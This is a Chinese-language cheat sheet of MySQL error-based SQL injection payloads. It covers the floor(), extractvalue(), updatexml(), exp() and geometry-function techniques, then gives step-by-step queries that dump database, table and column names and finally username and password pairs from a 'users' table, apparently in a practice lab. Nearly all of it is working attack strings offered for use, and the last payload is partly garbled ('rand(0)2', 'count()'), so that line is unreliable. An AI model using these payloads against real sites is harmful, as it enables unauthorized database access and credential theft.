报错注入一般流程
报错注入的五种函数
全部都以查user()为例子~
-
floor()
id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) -
extractvalue()
id = 1 and (extractvalue(1, concat(0x5c,(select user())))) -
updatexml()
id = 1 and (updatexml(0x3a,concat(1,(select user())),1)) -
exp()
id =1 and EXP(~(SELECT * from(select user())a)) -
有六种函数(但总的来说可以归为一类)
GeometryCollection()
id = 1 AND GeometryCollection((select * from (select * from(select user())a)b))
polygon()
id =1 AND polygon((select * from(select * from(select user())a)b))
multipoint()
id = 1 AND multipoint((select * from(select * from(select user())a)b))
multilinestring()
id = 1 AND multilinestring((select * from(select * from(select user())a)b))
linestring()
id = 1 AND LINESTRING((select * from(select * from(select user())a)b))
multipolygon()
id =1 AND multipolygon((select * from(select * from(select user())a)b))
以updatexml为例
-
爆库
id=1 and updatexml(1,concat(0x23,database()),1)
-
爆表
id=1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ )),1)
- 爆字段
id=1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)),1)
- 爆内容
id=1 and
updatexml(1,concat(0x23,(select group_concat(password,username) from security.users),0x23),1)
以floor为例
- 爆库id=1 union Select 1,count(*),concat(0x23,0x23,(select database()),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+
- 爆表id=1 union Select 1,count(*),concat(0x23,0x23,(select count(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+
表有六个
id=1 union Select 1,count(*),concat(0x23,0x23,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+
调整 limit 的参数,将所有表名爆出
id=1 union Select 1,count(*),concat(0x23,0x23,(select table_name from information_schema.tables where table_schema=‘security’ limit 1,1),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+
我们需要的是users表
- 爆列名
id=1 union Select 1,count(*),concat(0x23,0x23,(select count(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+
显示为三列
id=1 union Select 1,count(*),concat(0x23,0x23,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+
- 爆字段
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)